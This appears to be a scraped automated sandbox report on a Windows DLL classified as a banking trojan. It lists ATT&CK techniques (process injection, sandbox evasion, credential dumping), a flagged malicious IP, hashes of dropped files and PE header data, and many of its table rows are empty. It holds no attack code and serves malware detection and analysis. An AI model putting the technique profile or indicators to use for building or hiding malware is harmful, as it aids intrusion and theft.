Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 2_2_05113365 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 2_2_05114B89 |
Source: | Code function: | 2_2_05113365 |
Source: | Code function: | 2_2_05FB81F1 |
Source: | Code function: | 2_2_05116D78 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
94.140.115.8 | unknown | Latvia | 43513 | NANO-ASLV | true |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 617373 |
Start date and time: 28/04/202215:34:28 | 2022-04-28 15:34:28 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 29s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | 626a961800203.rar (renamed file extension from rar to dll) |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 43 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@28/17@0/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
- Excluded IPs from analysis (whitelisted): 13.107.42.16, 23.35.236.56
- Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6228 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
15:35:44 | API Interceptor | |
15:36:22 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
94.140.115.8 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
NANO-ASLV | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
⊘No context
⊘No context
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.8910535897909355 |
Encrypted: | false |
SSDEEP: | 192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ |
MD5: | F84F6C99316F038F964F3A6DB900038F |
SHA1: | C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1 |
SHA-256: | F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E |
SHA-512: | E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1192 |
Entropy (8bit): | 5.325275554903011 |
Encrypted: | false |
SSDEEP: | 24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5 |
MD5: | 05CF074042A017A42C1877FC5DB819AB |
SHA1: | 5AF2016605B06ECE0BFB3916A9480D6042355188 |
SHA-256: | 971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650 |
SHA-512: | 96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 4.004569426704533 |
Encrypted: | false |
SSDEEP: | 24:HRje9E2+f7vDfH9hhKdNWI+ycuZhNJakSXPNnq9qd:b7bdvKd41ulJa3Fq9K |
MD5: | E655BE880AD97ED626D857E71D386B60 |
SHA1: | A786C2FCC3E77FB2145825508B37B17466D1D905 |
SHA-256: | FB97FF6C91BB189C854D620ABE7E2CF2B6FB6154CD2A7A12E634E851915AD21B |
SHA-512: | 531132C345164EF991DC6623B44B705301FC5206BEFA785921CC2FAEC6B0ED677E9DB3DBAE3CCD45ADB2C191297743B3C2E205391BD39EEED2E1BA18C8F3271A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.9717803542241024 |
Encrypted: | false |
SSDEEP: | 24:H1je9E2+fDPKDfHyhKdNWI+ycuZhNFakSjPNnq9qd:PDPQoKd41ulFa3Jq9K |
MD5: | 4E319196ACB86E99D9B97635AA802521 |
SHA1: | 2F551D90630396C3AC8481B591D8D630E9DC6870 |
SHA-256: | E1AF91236ECCB6BD0B2E31C4A26AF6010D88EAEBB22DAA99C407DDFA1B202FEA |
SHA-512: | 184D2762F261C46330C47D9F3C5CBB344C46613DE92F05C6E3E08E293CEE8F353C5D48FA38A570DEF5F1AE38F9B56EC1F35030243858DD05CEA144B8BA70785E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1106268299163986 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWpYak7YnqqrpNPN5Dlq5J:+RI+ycuZhNJakSXPNnqX |
MD5: | AC00C19757068F83CB50DFA6C5FB7255 |
SHA1: | 5A0AC7FD81E2F8CDF625709537454AFD7C1F6C7B |
SHA-256: | 3635478A4D062AF857A8566DD85AB46EE9253177E6445DAFE0FDFF127F49D709 |
SHA-512: | 0ABE540517605E74DF22CBF3795FC4D9B484B8BE309B85BA1BFF1576391CF994BF5CD860B32F6031C3E8484443413FB37B298D00DC5BCD8B10DCC73C7FC92A5C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 403 |
Entropy (8bit): | 5.058106976759534 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.274033501792091 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f2zxs7+AEszIwkn23fL:p37Lvkmb6KRfOWZEifD |
MD5: | AC0706D981AAFBBEAB5D159A0606FD69 |
SHA1: | C21C570B756DF393048921EDA77C8BD3D67B2E84 |
SHA-256: | 33A657560271FCC02DCBAB9CE1B64DCDDB1668571DFDA4BDE24BFA65265F6303 |
SHA-512: | 6FC248335C3D231DC30EB7A484697A565620AF3C503301174B00BFEAEF298CA59DFE44FFBE218D99AC512DAAC0ECE00766DB096234E7CEF8BBB8D22D113F2BA8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.620004385389585 |
Encrypted: | false |
SSDEEP: | 24:etGSA8OmU0t3lm85xWAseO4zsQ64pfUPtkZf1fAVUWI+ycuZhNJakSXPNnq:66XQ3r5xNOzQfUuJ1f431ulJa3Fq |
MD5: | 0A77B73B308307CA80178B91A6ADB373 |
SHA1: | 77ECF476524ED9C50F0A3407AFD1C567CB9575E9 |
SHA-256: | 3AFE47D5D1AA26A1A72D9D41295AB4D0F6418F2A9EF7F242DFF30B222E465670 |
SHA-512: | D6D399E42758518F135D90C8B54E574EE78154B34EF8BBE4C1E4DAD582B92460E343F335B66FEB6338F708FBB14F7A9437DD0324928D9EA153926BD1E9958167 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.354685799707944 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfPEifiKaM5DqBVKVrdFAMBJTH:Akka6CPEuiKxDcVKdBJj |
MD5: | B1542326ED57702090D125AF64F2C458 |
SHA1: | 599EC5D66F76B4EF2A049D6FCFC4A3C12FC889B9 |
SHA-256: | 4E39D256644F4E4034CADD2599F89BEC1FB13DC3CCE6C57AEEE0C95A54196409 |
SHA-512: | E723D31CCEB781CD77CB0BA3170760E37B541DEF4B7756C7C7447A4D37722AF5C0B6A353BB1E22E7D322D1C5539DCE9A1977480121D0F0A3F8CC0F14D580EEB2 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.079770810918438 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynak7YnqqjPN5Dlq5J:+RI+ycuZhNFakSjPNnqX |
MD5: | 49500D4CE94E9FDBED89D7BD8B1B61CE |
SHA1: | BB950690E95DB3D2BD465D0CBA1C6E3DB840113A |
SHA-256: | E633211CABB9254E3534A63C5F7F8AB979674BC04E6A15F5C87ABD4AE6B68F9F |
SHA-512: | 4B9EF8040E0EA72981D3E7E4D4FD7FA515F8DFDE2304E58D2DA028F157857B590DFF106338275969A556C256E9604296827CAD0312450497CBE9F74765C24847 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
MD5: | 80545CB568082AB66554E902D9291782 |
SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.204819009968354 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23foCFqzxs7+AEszIwkn23foCFP:p37Lvkmb6KRftUWZEiftR |
MD5: | 160910514166C81D1D40C8920B01A46A |
SHA1: | 3E32407C4BED09BC17BE31DDADA342D9C2312661 |
SHA-256: | 7BF351FAEA9FE7A2F007F9EC7FE62E6F42FCBC597586709D4C28C341220EA3CD |
SHA-512: | 1BC303B9224368AB07725E891E1A45C227AC5BDC998CBA93C73BE43035E7623B9B126876F33A53B140A35E5678FD504461514146B455B6974B1E80A47F76F57F |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.588749209549368 |
Encrypted: | false |
SSDEEP: | 24:etGSgE/u2Bg85z7xlfwZD6vFgdWqtkZfoq/PWI+ycuZhNFakSjPNnq:6WYb5hFCD6vQWdJoqW1ulFa3Jq |
MD5: | 4BF37FD3F1893298DD04D902FF42CB3C |
SHA1: | F32FDE1A15FB3AA788CB92B323E0358E60D2130D |
SHA-256: | 34E3240AD8DDD2C5CCB04C8240DF70FB9A138084134AD61D0586E3CA72467B0D |
SHA-512: | 1E965509C738B58EFBF8574F3D9F9907DA7A683D8ED6902481F6BD74DD87CFD0A9E94F7DDD0CCFE39437286A54FDAC8CD60764D5B54EB7289CB4D0AB29E1D13D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.323364450020492 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRf3Eif6KaM5DqBVKVrdFAMBJTH:Akka6C3Eu6KxDcVKdBJj |
MD5: | 7CB77F9CD9B961C5FA10DC8E382363B5 |
SHA1: | 87B2639DFD176D5E3C6EECADCAF41EBE5655016E |
SHA-256: | 833D763ABB5539AB25BBDEB836035EA6675EC58FE3CFAFD3783A3CCC9FCF4641 |
SHA-512: | C9769A8C51B9D1644BAE7170EFDC7243499D3D0606F2029E78C6E252E1B5B2BB603E647CEAB86FE2B8657E72D68100D296F1BEE6927361D3A27A0E641D064097 |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220428\PowerShell_transcript.609290.5b3sR3N3.20220428153620.txt
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1355 |
Entropy (8bit): | 5.38313824612596 |
Encrypted: | false |
SSDEEP: | 24:BxSAR7vBZJsx2DOXUWS5o+LCH1r4qWMHjeTKKjX4CIym1ZJXu5o+LCH1r4JnxSAO:BZNvjOoOy5oh1r4tMqDYB1ZY5oh1r4NY |
MD5: | 23065A2E9223FC9CEAE89DD35C355A2D |
SHA1: | 6F6E50249A7DC923FEF89EE6CBD4D1D7C7139750 |
SHA-256: | 511CF786FA26019498C2542D4CB3954694D9406468A6875A04172D4CE05D1C9A |
SHA-512: | 8C0B98F86DC6D00E16785EBD3FAE84BEC1DDA1B3C2F26AC3778EBA2C92E84611E5B3E82DE828F270B9439618B7EB1135425587D83E033AA889CABB1E11E93E2D |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.102085694749143 |
TrID: |
|
File name: | 626a961800203.dll |
File size: | 618496 |
MD5: | d6c8aff647ab919e9bc6f2c8aeb125c7 |
SHA1: | f71c3d08ba85869cb45cb611c3ef9da8f5736b70 |
SHA256: | de5d66f93a36ef1db41b9b53913296c0ff2828d0b07baff68154fc54683ac45c |
SHA512: | 060d12d327494cacdf42379abc7448087c1b2af5df6c7a417a02a8e1119dff394420ffa3259dbe2fb90f84bf337ce1ce9c6c02fea672a31249edd47144ba80be |
SSDEEP: | 6144:eBbkmU1vOuplJSdX8vxxaYuQ1n79lmdrjhXccbwD1Yl/R0odd6MbBCKaDhabuFGs:iUJVpXScgQ1n7DQjbES/OodJ+KS |
TLSH: | 62D4E029C7501A6AD81537791899803F0A39F978E32F70EF26847D6FB50A6F05A34F39 |
File Content Preview: | MZ......................@...................................,...........!..L.!This program cannot be run in DOS mode....$........I.R.(n..(n..(n......(n..z...(n..P...(n.fLj..(n..vl..(n..z...(n..P...(n.._...(n..z...(n..z...(n......(n.fLk..(n..z...(n..z...(n |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401023 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x411096D1 [Wed Aug 4 07:57:05 2004 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | de44747c447d17324a209c20a63c5698 |
Instruction |
---|
jmp 00007FF48C72ED1Dh |
jmp 00007FF48C75F398h |
jmp 00007FF48C72EA93h |
jmp 00007FF48C72E86Eh |
jmp 00007FF48C72EB19h |
jmp 00007FF48C72E6F4h |
jmp 00007FF48C7648DFh |
jmp 00007FF48C72E81Ah |
jmp 00007FF48C757D45h |
jmp 00007FF48C767B80h |
jmp 00007FF48C76379Bh |
jmp 00007FF48C768C86h |
jmp 00007FF48C72E7A1h |
jmp 00007FF48C758EDCh |
jmp 00007FF48C76B407h |
jmp 00007FF48C7626F2h |
jmp 00007FF48C759F2Dh |
jmp 00007FF48C76D548h |
jmp 00007FF48C72E923h |
jmp 00007FF48C76A0AEh |
jmp 00007FF48C760579h |
jmp 00007FF48C75AF44h |
jmp 00007FF48C769CDFh |
jmp 00007FF48C72EA7Ah |
jmp 00007FF48C765985h |
jmp 00007FF48C75D290h |
jmp 00007FF48C76D4DBh |
jmp 00007FF48C75C156h |
jmp 00007FF48C72EA71h |
jmp 00007FF48C72E77Ch |
jmp 00007FF48C766AB7h |
jmp 00007FF48C76C422h |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8a000 | 0xa0 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8b000 | 0xc100 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x98000 | 0x1010 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x40000 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8a2ac | 0x20c | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
